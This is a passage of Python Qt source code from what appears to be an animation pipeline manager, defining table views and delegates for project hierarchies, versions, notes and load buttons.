self.setModel(None)
return None
def contextMenuEvent(self, event):
index = self.indexAt(event.pos())
menu = QtWidgets.QMenu()
if index.isValid():
# actions = []
menu.addAction(QtWidgets.QAction("Remove component", menu, triggered=functools.partial(self.remove, index)))
menu.addAction(QtWidgets.QAction("Add component", menu, triggered=functools.partial(self.add, index)))
# menu.addActions(actions)
menu.exec_(event.globalPos())
event.accept() # TELL QT IVE HANDLED THIS THING
return
def remove(self, index):
row = index.row()
parent = index.parent()
self.model().removeRows(row, 1, parent)
def add(self, index):
cat = dt.Hierarcy_component_node(name=cfg.Hierarcy_options.ASK_USER ,branch=cfg.Hierarcy_options.ASK_USER)
if self.model():
if index.isValid():
row = index.row()
else:
row = len(self.model().items)
self.model().insertRows(row + 1, 1, QtCore.QModelIndex(), node=cat)
else:
self.setModel_(models.Hierarchy_component_Model([cat]))
class Hierarcy_catagories_view(QtWidgets.QTableView):
def __init__(self, parentWidget=None, parent=None):
super(Hierarcy_catagories_view, self).__init__(parent)
self.parent = parent
self.parentWidget = parentWidget
self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
self.setShowGrid(False)
self.setFocusPolicy(QtCore.Qt.NoFocus)
def clearModel(self):
self.setModel(None)
def setModel_(self, model=None, delegates = True):
self.clearModel()
if model:
self.setModel(model)
# size the load button column
self.horizontalHeader().resizeSection(7, 100)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 6, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(6, 100)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 6, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(5, 100)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 5, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(4, 100)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 4, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(3, 100)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 3, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(2, 150)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 2, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(1, 100)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Stretch)
self.horizontalHeader().resizeSection(0, 30)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Stretch)
if delegates:
self.setItemDelegateForColumn(1, Hierarchy_name_delegate(self))
self.setItemDelegateForColumn(2, Hierarchy_quantitiy_delegate(self))
self.setItemDelegateForColumn(3, Hierarchy_name_delegate(self))
self.setItemDelegateForColumn(4, Hierarchy_name_delegate(self))
self.setItemDelegateForColumn(5, Hierarchy_name_delegate(self))
self.setItemDelegateForColumn(6, Hierarchy_name_delegate(self))
self.setItemDelegateForColumn(7, Hierarchy_name_delegate(self))
else:
self.setItemDelegateForColumn(7, Preset_generator_table_Delegate(self))
self.setItemDelegateForColumn(6, Preset_generator_table_Delegate(self))
self.setItemDelegateForColumn(5, Preset_generator_table_Delegate(self))
self.setItemDelegateForColumn(4, Preset_generator_table_Delegate(self))
self.setItemDelegateForColumn(3, Preset_generator_table_Delegate(self))
self.setItemDelegateForColumn(1, Preset_generator_table_Delegate(self))
self.setColumnHidden(2, True)
self.setEditTriggers(QtWidgets.QAbstractItemView.AllEditTriggers)
return True
self.setModel(None)
return None
def contextMenuEvent(self, event):
index = self.indexAt(event.pos())
menu = QtWidgets.QMenu()
if index.isValid():
# actions = []
menu.addAction(QtWidgets.QAction("Move up", menu, triggered=functools.partial(self.move_up, index)))
menu.addAction(QtWidgets.QAction("move down", menu, triggered=functools.partial(self.move_down, index)))
menu.addSeparator()
menu.addAction(QtWidgets.QAction("Remove category level", menu, triggered=functools.partial(self.remove, index)))
menu.addAction(QtWidgets.QAction("Add category level", menu, triggered=functools.partial(self.add, index)))
# menu.addActions(actions)
menu.exec_(event.globalPos())
event.accept() # TELL QT IVE HANDLED THIS THING
return
def remove(self, index):
row = index.row()
parent = index.parent()
self.model().removeRows(row, 1, parent)
def add(self, index):
cat = dt.Hierarcy_folder_node(name=cfg.Hierarcy_options.ASK_USER ,quantity=cfg.Hierarcy_options.SINGLE)
if self.model():
if index.isValid():
row = index.row()
else:
row = len(self.model().items)
self.model().insertRows(row + 1, 1, QtCore.QModelIndex(), node=cat)
else:
self.setModel_(models.Hierarchy_folders_Model([cat]))
def move_up(self, index):
self.model().move_up(index.row())
def move_down(self, index):
self.model().move_down(index.row())
class Projects_View(QtWidgets.QTableView):
def __init__(self, parentWidget=None, parent=None):
super(Projects_View, self).__init__(parent)
self.parent = parent
self.parentWidget = parentWidget
self.setShowGrid(False)
# self.setAlternatingRowColors(True)
self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
self.setWordWrap(True)
QtCompat.setSectionResizeMode(self.verticalHeader(), QtWidgets.QHeaderView.Fixed)
self.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.horizontalHeader().hide()
self.verticalHeader().hide()
self.setSortingEnabled(True)
# Set the delegate for column 0 of our table
self._proxyModel = None
def addSlider(self):
self._slider = IconScaleSlider(self)
self.parentWidget.layout().addWidget(self._slider)
self._slider.listSlider.sliderMoved.connect(self.icons_size)
self.icons_size(32)
def icons_size(self, int):
self.setIconSize(QtCore.QSize(int, int))
self.update()
def clearModel(self):
self.setModel(None)
if self._proxyModel:
self._proxyModel.setSourceModel(None)
self._proxyModel = None
def setModel_(self, model=None):
self.clearModel()
if model:
self._proxyModel = models.Projects_ProxyModel()
self._proxyModel.setSourceModel(model)
self.setModel(self._proxyModel)
# size the load button column
self.horizontalHeader().resizeSection(3, 100)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 4, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(2, 100)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 3, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(1, 100)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 2, QtWidgets.QHeaderView.Fixed)
#
# self.horizontalHeader().resizeSection(0, 30)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Stretch)
# setup the buttons for loading and more options with delegates
# self.setItemDelegateForColumn(0, Standard_table_Delegate(self))
# self.setItemDelegateForColumn(1, Standard_table_Delegate(self))
self.setItemDelegateForColumn(2, LinkProjectButtonDelegate(self))
self.setItemDelegateForColumn(3, EditProjectButtonDelegate(self))
self.setItemDelegateForColumn(4, SetProjectButtonDelegate(self))
self.setCurrentIndex(self.model().sourceModel().index(0, 0, None))
self.setColumnHidden(0, True)
return True
self.setModel(None)
return None
# self.setCurrentIndex(self.model().index(0,0, None))
def editProject(self):
button = self.sender()
index = self.indexAt(button.pos())
index = self.model().mapToSource(index)
if self.model().sourceModel().items[0].typeInfo() == cfg._new_:
self.model().sourceModel().items[0].parent().initialVersion()
else:
self.model().sourceModel().getNode(index).edit()
self.setCurrentIndex(index)
def setProject(self):
button = self.sender()
index = self.indexAt(button.pos())
index = self.model().mapToSource(index)
if self.model().sourceModel().items[0].typeInfo() == cfg._new_:
self.model().sourceModel().items[0].parent().initialVersion()
else:
self.model().sourceModel().getNode(index).set()
self.setCurrentIndex(index)
def linkProject(self):
button = self.sender()
index = self.indexAt(button.pos())
index = self.model().mapToSource(index)
project = self.model().sourceModel().getNode(index)
project.link()
self.model().sourceModel().reset()
self.viewport().repaint()
# def asModelIndex(self, index):
# return self.proxyModel.mapToSource(index)
#
# def asModelNode(self, index):
# return self.sourceModel.getNode(index)
def contextMenuEvent(self, event):
handled = True
index = self.indexAt(event.pos())
menu = QtWidgets.QMenu()
node = None
if index.isValid():
src = self._proxyModel.mapToSource(index)
node = self._proxyModel.sourceModel().getNode(src)
def_actions = list()
if node:
def_actions.append(QtWidgets.QAction("Explore...", menu,
triggered=functools.partial(self.explore, node)))
else:
event.accept()
return
menu.addActions(def_actions)
menu.exec_(event.globalPos())
event.accept()
return
def explore(self, node):
node.explore()
def dummy(self):
pass
class Run_scripts_View(QtWidgets.QTableView):
def __init__(self, parent=None):
super(Run_scripts_View, self).__init__(parent)
# self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
self.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.verticalHeader().setHidden(True)
def setModel(self, model=None):
super(Run_scripts_View, self).setModel(model)
# self.horizontalHeader().resizeSection(0, 35) # self._slider.listSlider.value())
QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Stretch)
self.horizontalHeader().resizeSection(1, 80)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Fixed)
# self.horizontalHeader().setStretchLastSection(False)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Fixed)
# self.setItemDelegateForColumn(2, RoleComboBoxDelegate(self))
#
# QtCompat.setSectionResizeMode(self.horizontalHeader(), QtWidgets.QHeaderView.Stretch)
# self.setEditTriggers(QtWidgets.QAbstractItemView.AllEditTriggers)
# def contextMenuEvent(self, event):
#
# index = self.indexAt(event.pos())
# menu = QtWidgets.QMenu()
#
# actions = []
# actions.append(QtWidgets.QAction("New user", menu, triggered=functools.partial(self.new_user, index)))
# actions.append(QtWidgets.QAction("Import users from a json file", menu, triggered=self.import_users))
#
# if index.isValid():
# actions.append(QtWidgets.QAction("Remove user", menu, triggered=functools.partial(self.remove_user, index)))
# menu.addActions(actions)
#
# menu.exec_(event.globalPos())
# event.accept() # TELL QT IVE HANDLED THIS THING
# return
# def remove_user(self, index):
# row = index.row()
# parent = index.parent()
# self.model().removeRows(row, 1, parent)
#
# def new_user(self, index):
# user = dt.UserNode("New user", "1234", cfg._admin_)
# if index.isValid():
# row = index.row()
# else:
# row = len(self.model().items)
#
# self.model().insertRows(row + 1, 1, QtCore.QModelIndex(), node=user)
#
# def import_users(self):
# path = QtWidgets.QFileDialog.getOpenFileName(self, "Select the users file", filter="json files (*.json)")
# if path[0]:
# users_file = serializer.JSONSerializer(path=str(path[0]))
# users_file = users_file.read()
# print users_file, "="
# self.setModel(None)
# users = []
# for key in users_file:
# users.append(dt.UserNode(key, users_file[key][0], users_file[key][1]))
#
# if users:
# self.setModel(models.Users_Model(users))
class HoverDelegate(QtWidgets.QStyledItemDelegate ): #QStyledItemDelegate
"""
A delegate that places a fully functioning QPushButton in every
cell of the column to which it's applied
"""
def __init__(self, parent):
# The parent is not an optional argument for the delegate as
# we need to reference it in the paint method (see below)
QtWidgets.QStyledItemDelegate.__init__(self, parent)
self.hovered_row = -1
def hover_signal_change(self, row):
self.hovered_row = row
def paint(self, painter, option, index):
if index.row() == self.hovered_row:
painter.save()
painter.fillRect(option.rect, QtGui.QColor('#646464') )
painter.setBrush(QtGui.QColor('#000'))
painter.setPen(QtGui.QColor("#000000"))
value = index.data(QtCore.Qt.DisplayRole)
value = str(value) if value else ''
painter.translate(5, 8)
# font = QtGui.QFont()
# font.setPointSize(9)
# painter.setFont(font)
painter.drawText(option.rect, QtCore.Qt.AlignLeft, value)
painter.restore()
else:
QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
class loadButtonDelegate(QtWidgets.QItemDelegate):
"""
A delegate that places a fully functioning QPushButton in every
cell of the column to which it's applied
"""
def __init__(self, parent):
# The parent is not an optional argument for the delegate as
# we need to reference it in the paint method (see below)
QtWidgets.QItemDelegate.__init__(self, parent)
self.hovered_row = -1
def hover_signal_change(self, row):
self.hovered_row = row
def eventFilter(self, sender, event):
if event.type() == QtCore.QEvent.Leave:
self.parent().hover_signal.emit(-1)
return True
if event.type() == QtGui.QMouseEvent:
self.parent().mouseMoveEvent(event)
return True
# if event.type() == QtCore.QEvent.Enter:
# self.parent().mouseMoveEvent(event)
# return True
return False
def paint(self, painter, option, index):
# This method will be called every time a particular cell is
# in view and that view is changed in some way. We ask the
# delegates parent (in this case a table view) if the index
# in question (the table cell) already has a widget associated
# with it. If not, create one with the text for this index and
# connect its clicked signal to a slot in the parent view so
# we are notified when its used and can do something.
# painter.save()
# painter.setPen(QtGui.QColor(cfg.colors.LIGHT_GRAY))
# painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
# painter.restore()
if index.row() == self.hovered_row:
painter.fillRect(option.rect, QtGui.QColor('#646464'))
else:
pass
if not self.parent().indexWidget(index):
soure_index = self.parent().model().mapToSource(index)
if self.parent().model().sourceModel().getNode(soure_index).typeInfo() == cfg._new_:
label = ""
icon = cfg.new_icon
if self.parent().model().sourceModel().getNode(soure_index).typeInfo() == cfg._playblast_:
label = ""
icon = cfg.play_icon
if self.parent().model().sourceModel().getNode(
soure_index).typeInfo() == cfg._version_ or self.parent().model().sourceModel().getNode(
soure_index).typeInfo() == cfg._master_:
label = ""
icon = self.parent().model().sourceModel().getNode(soure_index).status_icon
button = QtWidgets.QPushButton(
label,
self.parent(),
clicked=self.parent().MultiButtonClicked
)
button.setStyleSheet(cfg.table_button_stylesheet)
button.setIconSize(QtCore.QSize(20, 20))
button.setMouseTracking(True)
button.setAttribute(QtCore.Qt.WA_Hover, True)
button.installEventFilter(self)
table_button_stylesheet = '''
QPushButton{
border: 0px none;
border-radius: 0px;
border-bottom: 1px solid #555555;
background-color: transparent;
}
QPushButton::hover {
background-color: #808080;
}
QPushButton::pressed {
background-color: #484848;
}
'''
button.setStyleSheet(table_button_stylesheet)
button.setIcon(QtGui.QIcon(icon))
self.parent()._buttons.append(button)
self.parent().setIndexWidget(index, button)
class Library_delegate(QtWidgets.QItemDelegate):
"""
A delegate that places a fully functioning QPushButton in every
cell of the column to which it's applied
"""
def __init__(self, parent):
# The parent is not an optional argument for the delegate as
# we need to reference it in the paint method (see below)
QtWidgets.QItemDelegate.__init__(self, parent)
def paint(self, painter, option, index):
# This method will be called every time a particular cell is
# in view and that view is changed in some way. We ask the
# delegates parent (in this case a table view) if the index
# in question (the table cell) already has a widget associated
# with it. If not, create one with the text for this index and
# connect its clicked signal to a slot in the parent view so
# we are notified when its used and can do something.
if not self.parent().indexWidget(index):
soure_index = self.parent().model().mapToSource(index)
label = ""
icon = cfg.load_icon#self.parent().model().sourceModel().getNode(soure_index).status_icon
button = QtWidgets.QPushButton(
label,
self.parent(),
clicked=self.parent().MultiButtonClicked
)
button.setIconSize(QtCore.QSize(20, 20))
button.setStyleSheet(cfg.table_button_stylesheet)
button.setIcon(QtGui.QIcon(icon))
self.parent()._buttons.append(button)
self.parent().setIndexWidget(index, button)
class Preset_generator_table_Delegate(QtWidgets.QItemDelegate):
def __init__(self, parent):
# The parent is not an optional argument for the delegate as
# we need to reference it in the paint method (see below)
QtWidgets.QItemDelegate.__init__(self, parent)
def createEditor(self, parent, option, index):
if index.column() > 2:
editor = QtWidgets.QSpinBox(parent)
editor.setMinimum(0)
editor.setMaximum(999)
else:
editor = QtWidgets.QLineEdit(parent)
return editor
def setEditorData(self, editor, index):
if index.column() > 2:
value = int(index.model().data(index, QtCore.Qt.EditRole)) if index.model().data(index, QtCore.Qt.EditRole) != '' else 0
editor.setValue(value)
else:
value = index.model().data(index, QtCore.Qt.EditRole)
editor.setText(value)
def setModelData(self, editor, model, index):
if index.column() > 2:
editor.interpretText()
value = editor.value()
model.setData(index, value, QtCore.Qt.EditRole)
else:
value = editor.text()
if misc.validation_no_special_chars(value):
model.setData(index, value, QtCore.Qt.EditRole)
else:
model.setData(index, 'NO_SPECIAL_CHARS', QtCore.Qt.EditRole)
def paint(self, painter, option, index):
painter.save()
input_type = index.data(200)
value = index.data(QtCore.Qt.EditRole)
value = str(value)
painter.setPen(QtGui.QPen(QtGui.QColor(cfg.colors.LIGHT_GRAY_minus), 0.5))
painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
if input_type == cfg.Hierarcy_options.ASK_USER and value == '':
painter.setPen(QtGui.QPen(QtGui.QColor(cfg.colors.LIGHT_PURPLE), 0.5))
painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
if input_type == cfg.Hierarcy_options.ASK_USER and value != '':
painter.setPen(QtGui.QPen(QtGui.QColor(cfg.colors.DARK_GRAY_MINUS), 0.5))
painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
painter.setPen(QtGui.QPen(QtCore.Qt.white))
painter.translate(5, 8)
painter.drawText(option.rect, QtCore.Qt.AlignLeft, value)
painter.restore()
class Standard_table_Delegate(QtWidgets.QItemDelegate):
"""
A delegate that places a fully functioning QPushButton in every
cell of the column to which it's applied
"""
def __init__(self, parent):
# The parent is not an optional argument for the delegate as
# we need to reference it in the paint method (see below)
QtWidgets.QItemDelegate.__init__(self, parent)
#
# def paint(self, painter, option, index):
# # set background color
# # painter.setPen(QtWidgets.QPen(QtCore.Qt.NoPen))
# # if option.state & QStyle.State_Selected:
# # painter.setBrush(QBrush(Qt.red))
# # else:
# painter.save()
# role = index.data(200)
# value = index.data(QtCore.Qt.EditRole)
# value = str(value)
# if role == cfg.Hierarcy_options.ASK_USER and value == '':
# painter.setPen(QtWidgets.QPen(QtGui.QColor(cfg.colors.LIGHT_PURPLE_plus), 3.0))
# painter.drawRect(option.rect)
#
# if role == cfg.Hierarcy_options.ASK_USER and value != '':
# painter.setPen(QtWidgets.QPen(QtGui.QColor(cfg.colors.LIGHT_PURPLE), 3.0))
# painter.drawRect(option.rect)
#
# painter.setPen(QtWidgets.QPen(QtCore.Qt.white))
#
# painter.translate(5, 8)
# painter.drawText(option.rect, QtCore.Qt.AlignLeft, value)
#
# painter.restore()
# painter.save()
#
# # set background color
# painter.setPen(QPen(Qt.NoPen))
# if option.state & QStyle.State_Selected:
# painter.setBrush(QColor("#3399FF"))
# else:
# painter.setBrush(QBrush(Qt.white))
# painter.drawRect(option.rect)
#
# # set text color
# value = index.data(Qt.DisplayRole)
# if option.state & QStyle.State_Selected:
# painter.setPen(QPen(Qt.white))
# else:
# painter.setPen(QPen(Qt.black))
#
# # Left indent
# painter.translate(3, 0)
#
# painter.drawText(option.rect, Qt.AlignLeft, value)
#
# painter.restore()
# super(Standard_table_Delegate, self).paint(painter, option, index)
# return
# logger.info("working....")
# painter.save()
# painter.setPen(QtGui.QColor(cfg.colors.LIGHT_GRAY))
# painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
# painter.restore()
# if not self.parent().indexWidget(index):
#
# if self.parent().model().data(index, QtCore.Qt.DecorationRole):
# super(Standard_table_Delegate, self).paint(painter, option, index)
#
# else:
# # node = self.parent().model().sourceModel().getNode(soure_index)
# label = QtWidgets.QLabel((str(self.parent().model().data(index, QtCore.Qt.DisplayRole))))
# label.setMargin(5)
# self.parent().setIndexWidget(index, label)
# def paint(self, painter, option, index):
#
# # super(Standard_table_Delegate, self).paint(painter, option, index)
# # return
# # logger.info("working....")
# # painter.save()
# painter.setPen(QtGui.QColor(cfg.colors.LIGHT_GRAY))
# painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
# # painter.restore()
#
# if not self.parent().indexWidget(index):
#
# if self.parent().model().data(index, QtCore.Qt.DecorationRole):
# super(Standard_table_Delegate, self).paint(painter, option, index)
#
# else:
# # node = self.parent().model().sourceModel().getNode(soure_index)
# label = QtWidgets.QLabel((str(self.parent().model().data(index, QtCore.Qt.DisplayRole))))
# label.setMargin(5)
# self.parent().setIndexWidget(index, label)
# soure_index = self.parent().model().mapToSource(index)
#
# if self.parent().model().sourceModel().data(soure_index, QtCore.Qt.DecorationRole):
# super(Standard_table_Delegate, self).paint(painter, option, index)
# else:
# # node = self.parent().model().sourceModel().getNode(soure_index)
# label = QtWidgets.QLabel((str(self.parent().model().sourceModel().data(soure_index, QtCore.Qt.DisplayRole))))
# label.setMargin(5)
# if self.parent().model().sourceModel().data(soure_index, QtCore.Qt.FontRole):
# label.setFont(self.parent().model().sourceModel().data(soure_index, QtCore.Qt.FontRole))
#
# self.parent().setIndexWidget(index, label)
#
#
#
class NoteDelegate(QtWidgets.QStyledItemDelegate):
"""
A delegate that places a fully functioning QPushButton in every
cell of the column to which it's applied
"""
def __init__(self, parent):
super(NoteDelegate, self).__init__(parent)
# The parent is not an optional argument for the delegate as
# we need to reference it in the paint method (see below)
# QtWidgets.QItemDelegate.__init__(self, parent)
# css = loadCSS.loadCSS(os.path.join(os.path.dirname(pipeline.CSS.__file__), 'mainWindow.css'))
# self.setStyleSheet(css)
self.hovered_row = -1
def hover_signal_change(self, row):
self.hovered_row = row
# def paint(self, painter, option, index):
#
#
# # painter.save()
# painter.setPen(QtGui.QColor(cfg.colors.LIGHT_GRAY))
# painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
# # painter.restore()
# super(NoteDelegate, self).paint(painter, option, index)
# # QtWidgets.QItemDelegate.paint(self, painter, option, index)
def paint(self, painter, option, index):
# painter.setPen(QtGui.QColor(cfg.colors.LIGHT_GRAY))
# painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
# QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
if index.row() == self.hovered_row:
painter.save()
painter.fillRect(option.rect, QtGui.QColor('#808080') )#'#646464'
painter.setBrush(QtGui.QColor('#000'))
painter.setPen(QtGui.QColor("#000000"))
value = index.data(QtCore.Qt.DisplayRole)
value = str(value) if value else 'Click to edit...'
# font = QtGui.QFont()
# font.setPointSize(9)
# font.setItalic(True)
# painter.setFont(font)
text_rect = option.rect.adjusted(5, 8, 0, 0)
painter.drawText(text_rect, QtCore.Qt.AlignLeft, value)
painter.setClipRect(option.rect)
painter.restore()
else:
painter.setPen(QtGui.QColor(cfg.colors.LIGHT_GRAY))
painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
def createEditor(self, parent, option, index):
if index.column() == 1:
source_index = self.parent().model().mapToSource(index)
node = self.parent().model().sourceModel().getNode(source_index)
note_inpute = inputs.MultilineInput(plainText=node.note, caption="Save note for {}".format(node.name))
# note_inpute = inputs.MultilineInput(plainText = node.note, title = 'Commit massage', caption="Massage saved for {}".format(node.name), disabled = True)
note = note_inpute.exec_()
text = note_inpute.result()
if note == QtWidgets.QDialog.Accepted:
# self.shot.note("versions",self.shot_version, note=text)
# dlg = QtWidgets.QMessageBox()
# dlg.exec_()
# lineedit = QtWidgets.QLineEdit(parent)
# soure_index = self.parent().model().mapToSource(index)
self.parent().model().sourceModel().setData(source_index, text, role=QtCore.Qt.EditRole)
# return lineedit
return
return
# elif index.column() == 1:
# combo = QtGui.QComboBox(parent)
# return combo
# def setEditorData(self, editor, index):
# row = index.row()
# column = index.column()
# soure_index = self.parent().model().mapToSource(index)
# # value = index.model().items[row][column]
# # if isinstance(editor, QtWidgets.QComboBox):
# # editor.addItems(['Somewhere', 'Over', 'The Rainbow'])
# # editor.setCurrentIndex(index.row())
# if isinstance(editor, QtWidgets.QLineEdit):
# editor.setText('Somewhere over the rainbow')
class Versions_View(QtWidgets.QTableView):
hover_signal = QtCore.Signal(int)
def __init__(self, parentWidget=None, parent=None, settings = None):
super(Versions_View, self).__init__(parent)
self.css = loadCSS.loadCSS(os.path.join(os.path.dirname(pipeline.CSS.__file__), 'mainWindow.css'))
self.role = settings.current_role
self.permissions = permissions.Permissions
self._buttons = []
self.parent = parent
self.parentWidget = parentWidget
# self.setAlternatingRowColors(True)
# self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
self.setWordWrap(True)
self.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.setSortingEnabled(True)
self.setShowGrid(False)
# self.setMouseTracking(True)
# Set the delegate for column 0 of our table
self._proxyModel = None
self.horizontalHeader().setHidden(True)
self.verticalHeader().setHidden(True)
self.setFocusPolicy(QtCore.Qt.NoFocus)
self.installEventFilter(self)
self.setMouseTracking(True)
self.viewport().setAttribute(QtCore.Qt.WA_Hover, True)
# self.setStyleSheet('''
#
# QTreeView::item:hover {
# background: #101010;
# }
# QTreeView {
# outline: 0;
# }
# ''')
def eventFilter(self, sender, event):
if event.type() == QtCore.QEvent.Leave:
self.hover_signal.emit(-1)
return True
return False
def mouseMoveEvent(self, event):
row = self.indexAt(event.pos()).row()
self.hover_signal.emit(row)
def addSlider(self):
self._slider = IconScaleSlider(self)
self.parentWidget.layout().addWidget(self._slider)
self._slider.listSlider.sliderMoved.connect(self.icons_size)
self.icons_size(32)
def icons_size(self, int):
self.setIconSize(QtCore.QSize(int, int))
self.horizontalHeader().resizeSection(0, int)
self.verticalHeader().setDefaultSectionSize(int)
# QtCompat.setSectionResizeMode(self.header(), 0, QtWidgets.QHeaderView.Fixed)
try:
self.model().sourceModel()._rowHeight = int
except:
pass
#
# self.update(QtCore.QModelIndex())
def clearModel(self):
self._buttons = []
'''
THIS IS CRASHING PySide2 and looks fine without this so so be it :)
'''
if isinstance(self._proxyModel, models.Versions_ProxyModel) or isinstance(self._proxyModel, models.Masters_ProxyModel) or isinstance(self._proxyModel, models.Playblasts_ProxyModel) \
or isinstance(self._proxyModel, models.Simple_ProxyModel):
m = self._proxyModel.sourceModel()
self._proxyModel.setSourceModel(None)
del m
self.setModel(None)
self._proxyModel = None
# self.setModel(None)
# if self._proxyModel:
# self._proxyModel.setSourceModel(None)
# self._proxyModel = None
def setModel_(self, model=None):
self.clearModel()
if model:
# model._rowHeight = self._slider.listSlider.value()
self._proxyModel = models.Versions_ProxyModel()
self._proxyModel.setSourceModel(model)
self._proxyModel.setDynamicSortFilter(True)
self._proxyModel.setSortRole(models.Versions_Model.sortRole)
self.setModel(self._proxyModel)
# self.setIndentation(0)
self.proxyModel = self.model()
self.sourceModel = self.proxyModel.sourceModel()
self.horizontalHeader().resizeSection(0, 35)#self._slider.listSlider.value())
QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
# self.horizontalHeader().resizeSection(1, 32)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().setStretchLastSection(False)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Stretch)
self.horizontalHeader().resizeSection(2, 100)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 2, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(3, 80)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 3, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(4, 60)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 4, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(5, 32)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 5, QtWidgets.QHeaderView.Fixed)
row_del = HoverDelegate(self)
note_del = NoteDelegate(self)
load_del = loadButtonDelegate(self)
self.hover_signal.connect(row_del.hover_signal_change)
self.hover_signal.connect(note_del.hover_signal_change)
self.hover_signal.connect(load_del.hover_signal_change)
self.setItemDelegate(row_del)
# setup the buttons for loading and more options with delegates
self.setItemDelegateForColumn(5, load_del)
# note delegate
self.setItemDelegateForColumn(1, note_del)
self.sortByColumn(0, QtCore.Qt.DescendingOrder)
self.verticalHeader().setDefaultSectionSize(32)
'''
This is to hide the author column if no users are in the active project
'''
if not self.parent.project.users:
self.setColumnHidden(4, True)
else:
self.setColumnHidden(4, False)
# self.update()
def MultiButtonClicked(self):
# This slot will be called when our button is clicked.
# self.sender() returns a refence to the QPushButton created
# by the delegate, not the delegate itself.
button = self.sender()
index = self.indexAt(button.pos())
index = self.model().mapToSource(index)
if self.model().sourceModel().getNode(index).typeInfo() == cfg._new_:
node = self.model().sourceModel().getNode(index).parent()
node.initialVersion()
self._proxyModel.invalidate()
else:
if self.model().sourceModel().getNode(index).load():
pass
# self.parent.set_thumbnail(self.model().sourceModel().getNode(index).resource)
# self.parent.version = self.model().sourceModel().getNode(index)
# self.setCurrentIndex(self.model().mapFromSource(index))
# for btn in self._buttons:
# btn.setIcon(QtGui.QIcon(cfg.folder_open_icon))
#
# button.setIcon(QtGui.QIcon(cfg.reload_icon))
# try:
# version_buttons = self.parent.mastersView._buttons
# for btn in self.version_buttons:
# btn.setIcon(QtGui.QIcon(cfg.open_icon))
# except:
# print "can not reset versions table"
def contextMenuEvent(self, event):
handled = True
index = self.indexAt(event.pos())
menu = QtWidgets.QMenu()
node = None
if index.isValid():
src = self.asModelIndex(index)
node = self.asModelNode(src)
rows = self.selectionModel().selectedRows()
if rows:
node = [self.asModelNode(self.asModelIndex(r)) for r in rows]
actions = list()
def_actions = list()
if node:
# if node.typeInfo() == cfg._version_:
if isinstance(node, list):
if len(node)==1:
if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.reference_version):
actions.append(QtWidgets.QAction("Reference {} into the current scene".format(node[0].fullName), menu,triggered=functools.partial(self.reference_, node)))
if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.import_version):
actions.append(QtWidgets.QAction("Import {} into the current scene".format(node[0].fullName), menu,triggered=functools.partial(self.import_, node)))
if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.delete):
actions.append(QtWidgets.QAction("Delete...", menu,triggered=functools.partial(self.delete, node)))
def_actions.append(QtWidgets.QAction("Explore...", menu,triggered=functools.partial(self.explore, node)))
else:
if self.parent.current_component:
pass
# actions.append(QtWidgets.QAction("Explore...", menu,
# triggered=functools.partial(self.explore, self.parent.current_component)))
else:
event.accept()
return
menu.addActions(actions)
menu.addSeparator()
menu.addActions(def_actions)
menu.setStyleSheet(self.css)
